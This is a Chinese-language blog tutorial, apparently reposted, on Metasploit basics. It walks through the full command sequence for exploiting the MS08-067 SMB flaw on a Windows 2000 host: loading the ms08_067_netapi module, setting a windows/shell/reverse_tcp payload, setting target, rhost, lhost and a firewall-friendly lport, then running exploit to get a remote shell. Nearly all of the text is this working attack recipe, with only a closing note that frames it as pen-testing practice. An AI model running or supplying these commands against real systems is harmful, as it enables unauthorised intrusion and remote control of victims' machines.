OK 没啥问题! 如果你已经知道对方目标 存在某个漏洞 怎么办?
语法 search 漏洞名字 如果你知道是MS08-067漏洞 你就可以输入 search ms08_067 回车
如果你输入 search 就是查看所有的 那 Windows、Linux、Unix、等攻击插件 都会显示出来!
Disclosure Date 2008-10-28 (2008年10月末爆的漏洞)
exploit/windows/smb/ms08_067_netapi 攻击插件的名字!
怎么使用?????
use exploit/windows/smb/ms08_067_netapi OK 这就算使用上了
好 我们接下来 看看 这个 攻击载荷 特定平台的攻击代码
命令 是 show payloads
这么多 玩哪个??????
玩这个 windows/shell/reverse_tcp 反弹式TCP连接
完整的设置下就是 set payload windows/shell/reverse_tcp
接下来 我们要选择目标的主机系统以及我们的其他攻击配置
命令 show targets
支持攻击很多的Windows系统版本哦!
我们设置下 攻击参数
set target 1
set rhost 目标的IP地址
set lhost 本机的IP地址
set lport 8080 你这个端口 可以换换 443 什么的
我要攻击的是 1选项中的 Windows 2000系统
对方IP地址 192.168.1.101
我的IP地址 192.168.1.100
设置攻击机器的端口号码 8080 这个端口吧 一般防火墙 都给放!
我们输入 命令 show options 看看 攻击配置 是否出错 看来是没错的
开始攻击溢出吧 exploit
101的Windows主机利用漏洞被攻陷了!获取了Shell
我的文章,是教你怎么用框架,不是和你讨论漏洞古老不古老的问题,如果出新的漏洞,渗透测试工程师们,可以利用这个,去做漏洞验证,帮助你完成你的报告文档等工作!(特别是黑客界的白帽子们!)
比如,2013年的Java漏洞,更新下漏洞库,去尝试下嘛……
转载请注明:jinglingshu的博客 » Metasploit漏洞框架渗透测试基础